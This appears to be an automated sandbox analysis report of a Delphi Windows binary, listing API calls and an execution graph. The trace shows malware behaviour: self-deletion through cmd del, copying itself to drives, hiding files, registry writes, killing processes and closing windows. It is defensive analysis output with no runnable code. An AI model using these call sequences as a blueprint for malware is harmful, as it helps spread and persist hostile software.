Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
APIs
• GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
  • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
• WinExec.KERNEL32(00000000,004051C8), ref: 00405174
Similarity
• API ID: EnvironmentExecFileModuleNameVariable
• String ID: /c del "$Comspec
• API String ID: 451393584-1443122049
APIs
• GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
  • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
• WinExec.KERNEL32(00000000,004051C8), ref: 00405174
Similarity
• API ID: EnvironmentExecFileModuleNameVariable
• String ID: /c del "$Comspec
• API String ID: 451393584-1443122049
APIs
• RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
• RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
• LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
• RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
APIs
  • Part of subcall function 00403144: GetKeyboardType.USER32(00000000), ref: 00403149
  • Part of subcall function 00403144: GetKeyboardType.USER32(00000001), ref: 00403155
• GetCommandLineA.KERNEL32 ref: 004040CC
• GetCurrentThreadId.KERNEL32 ref: 004040E0
  • Part of subcall function 00403174: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
  • Part of subcall function 00403174: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
  • Part of subcall function 00403174: RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Similarity
                                                                            • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                            • String ID: 8&}
                                                                            • API String ID: 3316616684-945021855
                                                                            • Opcode ID: baaa3127af269219a38dde840f1c6f9df0e96bc1f23aa25374622c4cae3c8862
                                                                            • Instruction ID: f6e15f59299165cda9f09c884210f78b91d7a713eb75e9a4c49f8d115a364ab3
                                                                            • Opcode Fuzzy Hash: baaa3127af269219a38dde840f1c6f9df0e96bc1f23aa25374622c4cae3c8862
                                                                            • Instruction Fuzzy Hash: 99F0AC70811385D5E700FF62AA462093EA5AF0534DB4085BFE5807B2B7EB7D45688B6F

                                                                            Execution Graph

                                                                            Execution Coverage:26.6%
                                                                            Dynamic/Decrypted Code Coverage:3.3%
                                                                            Signature Coverage:0.3%
                                                                            Total number of Nodes:1618
                                                                            Total number of Limit Nodes:47
                                                                            execution_graph 5609 439cc7 5610 439ced 5609->5610 5611 439d06 VirtualAlloc 5610->5611 5613 439d2a 5611->5613 5616 439d46 5613->5616 5615 439d3e 5618 439d9b 5616->5618 5619 439e05 LoadLibraryA 5618->5619 5620 439e3f 5618->5620 5619->5618 5622 5418b2 5620->5622 5626 5418c0 5622->5626 5623 5418f4 CreateMutexA 5624 54190f 5623->5624 5627 439eb9 5623->5627 5625 541925 FindCloseChangeNotification 5624->5625 5624->5627 5625->5627 5626->5623 5626->5627 5627->5615 7054 4084c8 7055 406f74 60 API calls 7054->7055 7056 4084cd 7055->7056 7067 40558c FindWindowA 7056->7067 7060 4084d7 7063 4084ef 7060->7063 7108 405fb0 7060->7108 7062 408511 7063->7062 7064 404d04 GetVersionExA 7063->7064 7065 408507 7064->7065 7065->7062 7158 406354 7065->7158 7068 4055a5 EnumChildWindows 7067->7068 7069 4055c8 7067->7069 7070 4055bb FindWindowExA 7068->7070 7072 406c30 7069->7072 7071 4055c4 7070->7071 7071->7068 7071->7069 7073 404f2c 28 API calls 7072->7073 7074 406c62 7073->7074 7075 403b5c 27 API calls 7074->7075 7076 406c6f 7075->7076 7077 404cf4 4 API calls 7076->7077 7078 406c77 7077->7078 7079 406ee7 7078->7079 7080 406c7f 7078->7080 7082 4039f4 11 API calls 7079->7082 7081 404f2c 28 API calls 7080->7081 7083 406c87 7081->7083 7084 406f01 7082->7084 7085 403b5c 27 API calls 7083->7085 7084->7060 7086 406c94 7085->7086 7087 4027bc 4 API calls 7086->7087 7088 406cab 7087->7088 7089 402560 4 API calls 7088->7089 7090 406cb0 7089->7090 7091 402dec 27 API calls 7090->7091 7092 406cc0 7091->7092 7093 402e58 4 API calls 7092->7093 7094 406cca 7093->7094 7095 402560 4 API calls 7094->7095 7096 406ccf 7095->7096 7097 402ba8 4 API calls 7096->7097 7098 406cd9 7097->7098 7099 402560 4 API calls 7098->7099 7100 406cde FindWindowA 7099->7100 7100->7079 7101 406d00 GetWindowTextA 7100->7101 7102 403b3c 27 API calls 7101->7102 7107 406d32 7102->7107 7103 406ebb FindWindowExA 7103->7079 7103->7101 7104 406db2 FindWindowExA 
FindWindowExA FindWindowExA FindWindowExA FindWindowExA 7104->7103 7104->7107 7105 403b3c 27 API calls 7105->7107 7106 406e6b SendMessageA Sleep SendMessageA SendMessageA 7106->7103 7107->7103 7107->7104 7107->7105 7107->7106 7112 405fb8 7108->7112 7109 40601a GetDriveTypeA 7109->7112 7110 406283 7113 4039f4 11 API calls 7110->7113 7111 403ba0 27 API calls 7111->7112 7112->7109 7112->7110 7112->7111 7114 404cf4 4 API calls 7112->7114 7121 406045 7112->7121 7115 40629d 7113->7115 7114->7112 7116 4039d0 11 API calls 7115->7116 7118 4062a5 7116->7118 7117 403ba0 27 API calls 7117->7121 7118->7063 7119 404cf4 4 API calls 7119->7121 7120 4060c3 SetFileAttributesA 7122 403ba0 27 API calls 7120->7122 7121->7117 7121->7119 7121->7120 7123 406061 7121->7123 7124 4060de 7122->7124 7125 403ba0 27 API calls 7123->7125 7127 4060e6 SetFileAttributesA 7124->7127 7126 406073 7125->7126 7129 40607b SetFileAttributesA 7126->7129 7128 403ba0 27 API calls 7127->7128 7130 4060fc 7128->7130 7131 403ba0 27 API calls 7129->7131 7133 406104 DeleteFileA 7130->7133 7132 406093 7131->7132 7135 40609b SetFileAttributesA 7132->7135 7134 403ba0 27 API calls 7133->7134 7136 40611a 7134->7136 7135->7110 7137 406122 DeleteFileA 7136->7137 7138 403e74 27 API calls 7137->7138 7139 406134 7138->7139 7140 406140 GetModuleFileNameA 7139->7140 7141 403e74 27 API calls 7140->7141 7143 406155 7141->7143 7142 403ba0 27 API calls 7142->7143 7143->7142 7144 406177 CopyFileA 7143->7144 7145 403ba0 27 API calls 7144->7145 7153 40618d 7145->7153 7146 4027c8 4 API calls 7146->7153 7147 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7147->7153 7148 4027d4 4 API calls 7148->7153 7149 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7149->7153 7150 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7150->7153 7151 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7151->7153 7152 403ba0 27 API calls 7152->7153 7153->7146 7153->7147 7153->7148 7153->7149 7153->7150 7153->7151 7153->7152 7154 406253 
SetFileAttributesA 7153->7154 7155 403ba0 27 API calls 7154->7155 7156 40626b 7155->7156 7157 406273 SetFileAttributesA 7156->7157 7157->7112 7162 40635c 7158->7162 7159 4063be GetDriveTypeA 7159->7162 7160 403ba0 27 API calls 7160->7162 7161 406627 7164 4039f4 11 API calls 7161->7164 7162->7159 7162->7160 7162->7161 7163 404cf4 4 API calls 7162->7163 7171 4063e9 7162->7171 7163->7162 7165 406641 7164->7165 7166 4039d0 11 API calls 7165->7166 7168 406649 7166->7168 7167 403ba0 27 API calls 7167->7171 7168->7062 7169 404cf4 4 API calls 7169->7171 7170 406467 SetFileAttributesA 7172 403ba0 27 API calls 7170->7172 7171->7167 7171->7169 7171->7170 7173 406405 7171->7173 7174 406482 7172->7174 7175 403ba0 27 API calls 7173->7175 7177 40648a SetFileAttributesA 7174->7177 7176 406417 7175->7176 7179 40641f SetFileAttributesA 7176->7179 7178 403ba0 27 API calls 7177->7178 7180 4064a0 7178->7180 7181 403ba0 27 API calls 7179->7181 7183 4064a8 DeleteFileA 7180->7183 7182 406437 7181->7182 7185 40643f SetFileAttributesA 7182->7185 7184 403ba0 27 API calls 7183->7184 7186 4064be 7184->7186 7185->7161 7187 4064c6 DeleteFileA 7186->7187 7188 403e74 27 API calls 7187->7188 7189 4064d8 7188->7189 7190 4064e4 GetModuleFileNameA 7189->7190 7191 403e74 27 API calls 7190->7191 7193 4064f9 7191->7193 7192 403ba0 27 API calls 7192->7193 7193->7192 7194 40651b CopyFileA 7193->7194 7195 403ba0 27 API calls 7194->7195 7203 406531 7195->7203 7196 4027c8 4 API calls 7196->7203 7197 403ba0 27 API calls 7197->7203 7198 4027d4 4 API calls 7198->7203 7199 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7199->7203 7200 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7200->7203 7201 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7201->7203 7202 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 7202->7203 7203->7196 7203->7197 7203->7198 7203->7199 7203->7200 7203->7201 7203->7202 7204 4065f7 SetFileAttributesA 7203->7204 7205 403ba0 27 API calls 7204->7205 7206 40660f 
7205->7206 7207 406617 SetFileAttributesA 7206->7207 7207->7162 7212 43834b 7213 43835e VirtualFree 7212->7213 7216 438408 7213->7216 7220 438524 7216->7220 7217 438518 7218 4384f9 VirtualProtect 7218->7217 7218->7218 7222 43844c 7220->7222 7223 438532 7220->7223 7221 438550 LoadLibraryA 7221->7222 7221->7223 7222->7217 7222->7218 7223->7221 7223->7222 7418 43814a 7419 438159 7418->7419 7421 4381fa 7419->7421 7422 438214 7421->7422 7423 43851d 7422->7423 7424 438231 VirtualAlloc 7422->7424 7423->7419 7424->7423 7425 438273 7424->7425 7426 43827e 3 API calls 7425->7426 7426->7423 5628 408bd4 5629 408bdc 5628->5629 5629->5629 5685 4041b0 GetModuleHandleA 5629->5685 5632 408c45 5689 404f2c GetWindowsDirectoryA 5632->5689 5633 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5633->5632 5637 408c5f 5638 408c67 SetFileAttributesA 5637->5638 5708 403e74 5638->5708 5640 408c7c 5641 408c8d GetModuleFileNameA 5640->5641 5642 403e74 27 API calls 5641->5642 5643 408ca5 5642->5643 5644 404f2c 28 API calls 5643->5644 5645 408cad 5644->5645 5646 403b5c 27 API calls 5645->5646 5647 408cba 5646->5647 5648 408cc2 DeleteFileA 5647->5648 5649 404f2c 28 API calls 5648->5649 5650 408cd2 5649->5650 5651 403b5c 27 API calls 5650->5651 5652 408cdf 5651->5652 5653 408cf4 CopyFileA 5652->5653 5714 404a64 5653->5714 5656 404f2c 28 API calls 5657 408d15 5656->5657 5658 403b5c 27 API calls 5657->5658 5659 408d22 5658->5659 5660 404a64 28 API calls 5659->5660 5661 408d2d 5660->5661 5662 408d38 5661->5662 5663 408d79 5661->5663 5665 404d98 28 API calls 5662->5665 5720 404d98 5663->5720 5667 408d3d 5665->5667 5669 406928 36 API calls 5667->5669 5671 408d42 5669->5671 5673 404f2c 28 API calls 5671->5673 5675 408d50 5673->5675 5674 408d88 5810 408a20 LoadIconA LoadCursorA RegisterClassA 5674->5810 5677 403b5c 27 API calls 5675->5677 5679 408d5d 5677->5679 5678 408d8d 5830 4039f4 5678->5830 5681 408d65 ShellExecuteA 5679->5681 5819 407d8c 5681->5819 5684 408d77 5684->5678 5686 4041e3 
5685->5686 5834 403788 5686->5834 5690 403b3c 27 API calls 5689->5690 5691 404f52 5690->5691 5692 404f6e 5691->5692 5693 403b5c 27 API calls 5691->5693 5694 403b5c 5692->5694 5693->5692 5695 403b60 5694->5695 5696 403b9f 5694->5696 5697 403a24 5695->5697 5698 403b6a 5695->5698 5696->5637 5704 403a94 27 API calls 5697->5704 5705 403a38 5697->5705 5699 403b94 5698->5699 5700 403b7d 5698->5700 5702 403e74 27 API calls 5699->5702 5703 403e74 27 API calls 5700->5703 5701 403a66 5701->5637 5707 403b82 5702->5707 5703->5707 5704->5705 5705->5701 5706 40248c 11 API calls 5705->5706 5706->5701 5707->5637 5709 403e81 5708->5709 5713 403eb1 5708->5713 5711 403e8d 5709->5711 5712 403a94 27 API calls 5709->5712 5710 4039d0 11 API calls 5710->5711 5711->5640 5712->5713 5713->5710 5715 404a72 5714->5715 6951 403ac0 5715->6951 5718 404a93 5718->5656 5719 404a8a CharUpperBuffA 5719->5718 5721 403e74 27 API calls 5720->5721 5722 404da7 5721->5722 5723 404db6 GetModuleFileNameA 5722->5723 5724 403e74 27 API calls 5723->5724 5725 404dce 5724->5725 5726 406928 5725->5726 5727 406930 5726->5727 6956 402f90 5727->6956 5730 402560 4 API calls 5731 40697c 5730->5731 6960 402c3c 5731->6960 5734 402560 4 API calls 5735 40698c 5734->5735 6968 402fac 5735->6968 5737 40699c 5738 402560 4 API calls 5737->5738 5739 4069a1 5738->5739 6975 402b88 5739->6975 5742 402560 4 API calls 5743 4069ba 5742->5743 5744 402c3c 6 API calls 5743->5744 5745 4069d8 5744->5745 5746 402560 4 API calls 5745->5746 5747 4069dd 5746->5747 5748 402fac 6 API calls 5747->5748 5749 4069ef 5748->5749 5750 402560 4 API calls 5749->5750 5751 4069f4 5750->5751 5752 402b88 6 API calls 5751->5752 5753 406a1b 5752->5753 5754 402560 4 API calls 5753->5754 5755 406a20 5754->5755 5756 403ac0 27 API calls 5755->5756 5757 406a36 5756->5757 6978 404d48 5757->6978 5762 404dd0 27 API calls 5763 406a6a 5762->5763 5764 403a24 27 API calls 5763->5764 5765 406a7a 5764->5765 5766 403da4 27 API calls 5765->5766 5767 406a95 5766->5767 5768 
404dd0 27 API calls 5767->5768 5769 406aa6 5768->5769 5770 403a24 27 API calls 5769->5770 5771 406ab6 5770->5771 5772 403da4 27 API calls 5771->5772 5773 406ad3 5772->5773 5774 404dd0 27 API calls 5773->5774 5775 406ae4 5774->5775 5776 403a24 27 API calls 5775->5776 5777 406af4 5776->5777 5778 403da4 27 API calls 5777->5778 5779 406b11 5778->5779 5780 404dd0 27 API calls 5779->5780 5781 406b22 5780->5781 5782 403a24 27 API calls 5781->5782 5783 406b32 5782->5783 5784 403da4 27 API calls 5783->5784 5785 406b4f 5784->5785 5786 404dd0 27 API calls 5785->5786 5787 406b60 5786->5787 5788 403a24 27 API calls 5787->5788 5789 406b70 5788->5789 5790 403da4 27 API calls 5789->5790 5791 406b8d 5790->5791 5792 404dd0 27 API calls 5791->5792 5793 406b9e 5792->5793 5794 403a24 27 API calls 5793->5794 5795 406bae 5794->5795 5796 403da4 27 API calls 5795->5796 5797 406bcb 5796->5797 5798 404dd0 27 API calls 5797->5798 5799 406bdc 5798->5799 5800 403a24 27 API calls 5799->5800 5801 406bec 5800->5801 5802 402ba8 4 API calls 5801->5802 5803 406bf7 5802->5803 5804 402560 4 API calls 5803->5804 5805 406bfc 5804->5805 5806 4039f4 11 API calls 5805->5806 5807 406c19 5806->5807 5808 4039d0 11 API calls 5807->5808 5809 406c21 5808->5809 5824 4049cc GetVersionExA 5809->5824 5811 408b10 5810->5811 5812 408a88 5810->5812 5811->5678 7017 404414 CreateWindowExA 5812->7017 5814 408aae 5814->5811 5815 408abc SetTimer 5814->5815 5816 408aeb GetMessageA 5815->5816 5817 408afb KillTimer 5816->5817 5818 408adf TranslateMessage DispatchMessageA 5816->5818 5817->5811 5818->5816 5820 407d9d 5819->5820 5821 407da5 5820->5821 7018 4050dc GetEnvironmentVariableA 5820->7018 5821->5684 5825 404a32 5824->5825 5826 4049e9 5824->5826 5825->5674 5826->5825 5827 4049f0 LoadLibraryA 5826->5827 5827->5825 5828 404a08 GetProcAddress 5827->5828 5829 404a27 FreeLibrary 5828->5829 5829->5825 5832 4039fa 5830->5832 5831 403a20 5832->5831 5833 40248c 11 API calls 5832->5833 5833->5832 5835 4037bb 5834->5835 5838 403728 
5835->5838 5839 403764 FindWindowA 5838->5839 5840 403737 5838->5840 5839->5632 5839->5633 5840->5839 5844 408550 5840->5844 5919 40854e 5840->5919 5994 408494 InternetGetConnectedState 5840->5994 5845 408558 5844->5845 5845->5845 5846 4087e5 5845->5846 6000 406f74 GetDesktopWindow 5845->6000 5849 4039f4 11 API calls 5846->5849 5851 4087ff 5849->5851 5851->5840 5854 40859b 5855 404dd0 27 API calls 5854->5855 5856 4085b1 5855->5856 6069 404c18 5856->6069 5861 404f2c 28 API calls 5862 4085db 5861->5862 5863 403b5c 27 API calls 5862->5863 5864 4085e8 5863->5864 6085 404af8 5864->6085 5867 404f2c 28 API calls 5868 40860f 5867->5868 5869 403b5c 27 API calls 5868->5869 5870 40861c 5869->5870 5871 408624 DeleteFileA 5870->5871 6094 4042ac CreateMutexA 5871->6094 5873 408638 6095 4042ac CreateMutexA 5873->6095 5875 408646 6096 4042ac CreateMutexA 5875->6096 5877 408654 5878 404f2c 28 API calls 5877->5878 5879 40865c 5878->5879 5880 404dd0 27 API calls 5879->5880 5881 40866d 5880->5881 5882 403b5c 27 API calls 5881->5882 5883 408676 5882->5883 5884 40867e DeleteFileA 5883->5884 6097 4042ac CreateMutexA 5884->6097 5886 408692 5887 404dd0 27 API calls 5886->5887 5888 40869f 5887->5888 6098 404854 5888->6098 5891 404dd0 27 API calls 5892 4086b4 5891->5892 5893 404854 49 API calls 5892->5893 5894 4086bc 5893->5894 6114 404b70 5894->6114 5897 404b70 14 API calls 5898 4086e4 5897->5898 5899 404b70 14 API calls 5898->5899 5900 4086f8 5899->5900 5901 404b70 14 API calls 5900->5901 5902 40870c 5901->5902 5903 404b70 14 API calls 5902->5903 5904 408720 5903->5904 5905 404dd0 27 API calls 5904->5905 5906 40872d 5905->5906 5907 404b70 14 API calls 5906->5907 5908 40873f 5907->5908 5909 404dd0 27 API calls 5908->5909 5910 40874c 5909->5910 5911 404b70 14 API calls 5910->5911 5912 40875e 5911->5912 5913 404d98 28 API calls 5912->5913 5914 408763 5913->5914 5915 406928 36 API calls 5914->5915 5916 408768 5915->5916 5917 408494 46 API calls 5916->5917 5918 40876d CreateThread CreateThread 
CreateThread CreateThread CreateThread 5917->5918 5918->5846 6259 407dd0 Sleep 5918->6259 6280 407f54 Sleep 5918->6280 6297 4084b8 Sleep 5918->6297 6300 407bec 5918->6300 6332 4072ac 5918->6332 5921 408550 5919->5921 5920 4087e5 5924 4039f4 11 API calls 5920->5924 5921->5920 5922 406f74 60 API calls 5921->5922 5923 408580 5922->5923 5925 4039d0 11 API calls 5923->5925 5926 4087ff 5924->5926 5927 40858a 5925->5927 5926->5840 5928 404dd0 27 API calls 5927->5928 5929 40859b 5928->5929 5930 404dd0 27 API calls 5929->5930 5931 4085b1 5930->5931 5932 404c18 31 API calls 5931->5932 5933 4085c6 5932->5933 5934 403a24 27 API calls 5933->5934 5935 4085d3 5934->5935 5936 404f2c 28 API calls 5935->5936 5937 4085db 5936->5937 5938 403b5c 27 API calls 5937->5938 5939 4085e8 5938->5939 5940 404af8 30 API calls 5939->5940 5941 408607 5940->5941 5942 404f2c 28 API calls 5941->5942 5943 40860f 5942->5943 5944 403b5c 27 API calls 5943->5944 5945 40861c 5944->5945 5946 408624 DeleteFileA 5945->5946 6871 4042ac CreateMutexA 5946->6871 5948 408638 6872 4042ac CreateMutexA 5948->6872 5950 408646 6873 4042ac CreateMutexA 5950->6873 5952 408654 5953 404f2c 28 API calls 5952->5953 5954 40865c 5953->5954 5955 404dd0 27 API calls 5954->5955 5956 40866d 5955->5956 5957 403b5c 27 API calls 5956->5957 5958 408676 5957->5958 5959 40867e DeleteFileA 5958->5959 6874 4042ac CreateMutexA 5959->6874 5961 408692 5962 404dd0 27 API calls 5961->5962 5963 40869f 5962->5963 5964 404854 49 API calls 5963->5964 5965 4086a7 5964->5965 5966 404dd0 27 API calls 5965->5966 5967 4086b4 5966->5967 5968 404854 49 API calls 5967->5968 5969 4086bc 5968->5969 5970 404b70 14 API calls 5969->5970 5971 4086d0 5970->5971 5972 404b70 14 API calls 5971->5972 5973 4086e4 5972->5973 5974 404b70 14 API calls 5973->5974 5975 4086f8 5974->5975 5976 404b70 14 API calls 5975->5976 5977 40870c 5976->5977 5978 404b70 14 API calls 5977->5978 5979 408720 5978->5979 5980 404dd0 27 API calls 5979->5980 5981 40872d 5980->5981 5982 404b70 
14 API calls 5981->5982 5983 40873f 5982->5983 5984 404dd0 27 API calls 5983->5984 5985 40874c 5984->5985 5986 404b70 14 API calls 5985->5986 5987 40875e 5986->5987 5988 404d98 28 API calls 5987->5988 5989 408763 5988->5989 5990 406928 36 API calls 5989->5990 5991 408768 5990->5991 5992 408494 46 API calls 5991->5992 5993 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5992->5993 5993->5920 6875 407dd0 45 API calls 5993->6875 6876 407f54 68 API calls 5993->6876 6877 4084b8 47 API calls 5993->6877 6878 407bec 37 API calls 5993->6878 6879 4072ac 75 API calls 5993->6879 5995 4084b6 5994->5995 5996 4084ac 5994->5996 5995->5840 6880 4080c8 5996->6880 6001 406fab FindWindowExA GetWindowTextA 6000->6001 6122 403b3c 6001->6122 6003 406fe1 PostMessageA 6004 406fd0 6003->6004 6004->6001 6004->6003 6005 406ff1 GetDesktopWindow 6004->6005 6006 406ff8 FindWindowExA GetWindowTextA 6005->6006 6007 403b3c 27 API calls 6006->6007 6008 40701d 6007->6008 6008->6006 6009 40702e PostMessageA 6008->6009 6010 40703e GetDesktopWindow 6008->6010 6009->6008 6011 407045 FindWindowExA GetWindowTextA 6010->6011 6012 403b3c 27 API calls 6011->6012 6013 40706a 6012->6013 6013->6011 6014 40707b PostMessageA 6013->6014 6015 40708b GetDesktopWindow 6013->6015 6014->6013 6016 407092 FindWindowExA GetWindowTextA 6015->6016 6017 403b3c 27 API calls 6016->6017 6018 4070b7 6017->6018 6018->6016 6019 4070c8 PostMessageA 6018->6019 6020 4070d8 GetDesktopWindow 6018->6020 6019->6018 6021 4070df FindWindowExA GetWindowTextA 6020->6021 6022 403b3c 27 API calls 6021->6022 6023 407104 6022->6023 6023->6021 6024 407115 PostMessageA 6023->6024 6025 407125 GetDesktopWindow 6023->6025 6024->6023 6026 40712c FindWindowExA GetWindowTextA 6025->6026 6027 403b3c 27 API calls 6026->6027 6029 407151 6027->6029 6028 407162 PostMessageA 6028->6029 6029->6026 6029->6028 6030 407172 FindWindowA 6029->6030 6031 407182 FindWindowA PostMessageA 6030->6031 6032 40719a FindWindowA 6030->6032 6031->6032 
6033 4071c2 FindWindowA 6032->6033 6034 4071aa FindWindowA PostMessageA 6032->6034 6035 4071f0 6033->6035 6036 4071d5 FindWindowA PostMessageA 6033->6036 6034->6033 6037 4039f4 11 API calls 6035->6037 6036->6035 6038 40720a 6037->6038 6039 4039d0 6038->6039 6040 4039d6 6039->6040 6042 4039f1 6039->6042 6040->6042 6192 40248c 6040->6192 6043 404dd0 6042->6043 6044 404dd8 6043->6044 6045 404e12 6044->6045 6046 404e05 6044->6046 6196 403a68 6045->6196 6047 4039d0 11 API calls 6046->6047 6049 404e0d 6047->6049 6053 4039f4 11 API calls 6049->6053 6051 403a68 11 API calls 6052 404e2c 6051->6052 6054 403a68 11 API calls 6052->6054 6056 404ee5 6053->6056 6055 404e39 6054->6055 6057 403a68 11 API calls 6055->6057 6058 4039d0 11 API calls 6056->6058 6059 404e46 6057->6059 6060 404eed 6058->6060 6200 403c14 6059->6200 6060->5854 6209 404bfc RegOpenKeyExA 6069->6209 6071 404c35 RegQueryValueExA 6072 404c77 6071->6072 6073 404c5d 6071->6073 6074 4039d0 11 API calls 6072->6074 6075 403b3c 27 API calls 6073->6075 6076 404c7e RegCloseKey 6074->6076 6077 404c6f RegCloseKey 6075->6077 6078 404c84 6076->6078 6077->6078 6079 403a24 6078->6079 6080 403a28 6079->6080 6081 403a38 6079->6081 6080->6081 6083 403a94 27 API calls 6080->6083 6082 403a66 6081->6082 6084 40248c 11 API calls 6081->6084 6082->5861 6083->6081 6084->6082 6210 404acc RegCreateKeyExA 6085->6210 6087 404b1e 6211 403b00 6087->6211 6089 404b2a 6090 404b32 RegSetValueExA RegCloseKey 6089->6090 6091 404b55 6090->6091 6092 4039d0 11 API calls 6091->6092 6093 404b5d 6092->6093 6093->5867 6094->5873 6095->5875 6096->5877 6097->5886 6099 404897 6098->6099 6217 4047bc 6099->6217 6101 4048b9 6222 4047dc 6101->6222 6103 404996 6105 4039f4 11 API calls 6103->6105 6104 403b3c 27 API calls 6113 4048ca 6104->6113 6107 4049b3 6105->6107 6108 4039d0 11 API calls 6107->6108 6109 4049bb 6108->6109 6109->5891 6110 40496e OpenProcess TerminateProcess 6110->6113 6112 404fdc 27 API calls 6112->6113 6113->6103 6113->6104 6113->6110 
6113->6112 6227 405018 6113->6227 6237 4047fc 6113->6237 6115 404b87 6114->6115 6116 404ba9 RegOpenKeyA 6115->6116 6257 403d4c 6116->6257 6119 404be2 6120 4039f4 11 API calls 6119->6120 6121 404bef 6120->6121 6121->5897 6123 403ac0 6122->6123 6128 403a94 6123->6128 6125 403ad0 6126 4039d0 11 API calls 6125->6126 6127 403ae8 6126->6127 6127->6004 6129 403a98 6128->6129 6130 403abc 6128->6130 6133 40246c 6129->6133 6130->6125 6134 402471 6133->6134 6135 402484 6133->6135 6140 401ea4 6134->6140 6151 401ea5 6134->6151 6135->6125 6136 402477 6136->6135 6162 402554 6136->6162 6141 401ea5 6140->6141 6142 401ebd 6141->6142 6168 4017b8 RtlInitializeCriticalSection 6141->6168 6144 401eea RtlEnterCriticalSection 6142->6144 6145 401ef4 6142->6145 6148 401ec9 6142->6148 6144->6145 6145->6148 6175 401db0 6145->6175 6148->6136 6149 402015 RtlLeaveCriticalSection 6150 40201f 6149->6150 6150->6136 6152 401eb8 6151->6152 6155 401ebd 6151->6155 6153 4017b8 4 API calls 6152->6153 6153->6155 6154 401eea RtlEnterCriticalSection 6156 401ef4 6154->6156 6155->6154 6155->6156 6159 401ec9 6155->6159 6157 401db0 12 API calls 6156->6157 6156->6159 6158 401ffc 6157->6158 6160 402015 RtlLeaveCriticalSection 6158->6160 6161 40201f 6158->6161 6159->6136 6160->6161 6161->6136 6164 402508 6162->6164 6163 40252d 6189 4024fc 6163->6189 6164->6163 6181 404164 6164->6181 6169 4017e6 6168->6169 6170 4017dc RtlEnterCriticalSection 6168->6170 6171 401804 LocalAlloc 6169->6171 6170->6169 6172 40181e 6171->6172 6173 401863 RtlLeaveCriticalSection 6172->6173 6174 40186d 6172->6174 6173->6174 6174->6142 6177 401dc0 6175->6177 6176 401dec 6178 401bc4 9 API calls 6176->6178 6180 401e10 6176->6180 6177->6176 6179 401d24 12 API calls 6177->6179 6177->6180 6178->6180 6179->6177 6180->6149 6180->6150 6182 404173 6181->6182 6183 404199 TlsGetValue 6181->6183 6182->6163 6184 4041a3 6183->6184 6185 40417e 6183->6185 6184->6163 6186 404120 LocalAlloc TlsSetValue 6185->6186 6187 404183 TlsGetValue 6186->6187 6188 404192 
6187->6188 6188->6163 6190 4039b8 7 API calls 6189->6190 6191 402507 6190->6191 6191->6135 6193 402491 6192->6193 6195 4024a4 6192->6195 6194 402554 11 API calls 6193->6194 6193->6195 6194->6195 6195->6042 6198 403a6c 6196->6198 6197 403a90 6197->6051 6198->6197 6199 40248c 11 API calls 6198->6199 6199->6197 6201 403c25 6200->6201 6202 403c45 6201->6202 6203 403c59 6201->6203 6204 403e74 27 API calls 6202->6204 6205 403a94 27 API calls 6203->6205 6207 403c53 6204->6207 6205->6207 6206 403c8a 6207->6206 6208 403a24 27 API calls 6207->6208 6208->6206 6209->6071 6210->6087 6213 403ac0 6211->6213 6212 403a94 27 API calls 6214 403ad0 6212->6214 6213->6212 6215 4039d0 11 API calls 6214->6215 6216 403ae8 6215->6216 6216->6089 6242 404540 6217->6242 6220 4047d6 6220->6101 6221 4047cb CreateToolhelp32Snapshot 6221->6101 6223 404540 17 API calls 6222->6223 6224 4047e7 6223->6224 6225 4047f6 6224->6225 6226 4047eb Process32First 6224->6226 6225->6113 6226->6113 6228 40502a 6227->6228 6233 405067 6228->6233 6246 403de4 6228->6246 6230 405096 6231 403a24 27 API calls 6230->6231 6232 4050a0 6231->6232 6235 4039d0 11 API calls 6232->6235 6233->6230 6234 403de4 27 API calls 6233->6234 6234->6233 6236 4050b5 6235->6236 6236->6113 6238 404540 17 API calls 6237->6238 6239 404807 6238->6239 6240 404816 6239->6240 6241 40480b Process32Next 6239->6241 6240->6113 6241->6113 6243 40454f GetModuleHandleA 6242->6243 6245 404684 6242->6245 6244 404564 16 API calls 6243->6244 6243->6245 6244->6245 6245->6220 6245->6221 6251 403d9c 6246->6251 6248 403e28 6248->6228 6249 403df2 6249->6248 6250 403e74 27 API calls 6249->6250 6250->6248 6252 403d58 6251->6252 6253 403a94 27 API calls 6252->6253 6254 403d93 6252->6254 6255 403d6f 6253->6255 6254->6249 6255->6254 6256 40248c 11 API calls 6255->6256 6256->6254 6258 403d50 RegDeleteValueA RegCloseKey 6257->6258 6258->6119 6260 404f2c 28 API calls 6259->6260 6261 407df9 6260->6261 6262 403b5c 27 API calls 6261->6262 6263 407e06 6262->6263 6264 404af8 
